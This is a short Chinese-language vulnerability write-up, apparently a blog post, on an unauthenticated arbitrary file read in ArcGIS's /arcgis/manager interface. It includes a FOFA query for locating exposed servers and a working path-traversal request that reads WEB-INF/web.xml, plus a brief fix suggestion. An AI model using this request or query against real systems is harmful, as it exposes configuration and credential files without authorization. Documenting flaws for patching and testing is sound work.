ArcGIS地理空间平台 manager 任意文件读取漏洞复现

0x01 产品描述:

ArcGIS ‌是一个综合的地理空间平台,由Esri开发,旨在为专业人士和组织提供全面的地理信息系统(GIS)功能。ArcGIS通过集成和连接地理环境中的数据,支持创建、管理、分析、映射和共享各种类型的数据,从而帮助组织在决策制定中占据领先地位‌。
0x02 漏洞描述:

ArcGIS地理空间平台 /arcgis/manager接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 搜索语句:

Fofa:app="esri-ArcGIS"


0x04 漏洞复现:

GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.1
Host: your-ip


0x05 修复建议:

在处理客户端输入的参数时,进行严格的验证和过滤,防止未授权的文件访问。

相关推荐
儒道易行42 分钟前
【DVWA】RCE远程命令执行实战
网络·安全·网络安全
Hacker_LaoYi1 小时前
网络安全与加密
安全·web安全
Koi慢热2 小时前
路由基础(全)
linux·网络·网络协议·安全
hzyyyyyyyu3 小时前
内网安全隧道搭建-ngrok-frp-nps-sapp
服务器·网络·安全
网络研究院3 小时前
国土安全部发布关键基础设施安全人工智能框架
人工智能·安全·框架·关键基础设施
Daniel 大东5 小时前
BugJson因为json格式问题OOM怎么办
java·安全
EasyNVR9 小时前
NVR管理平台EasyNVR多个NVR同时管理:全方位安防监控视频融合云平台方案
安全·音视频·监控·视频监控
黑客Ash12 小时前
【D01】网络安全概论
网络·安全·web安全·php
阿龟在奔跑13 小时前
引用类型的局部变量线程安全问题分析——以多线程对方法局部变量List类型对象实例的add、remove操作为例
java·jvm·安全·list
.Ayang14 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构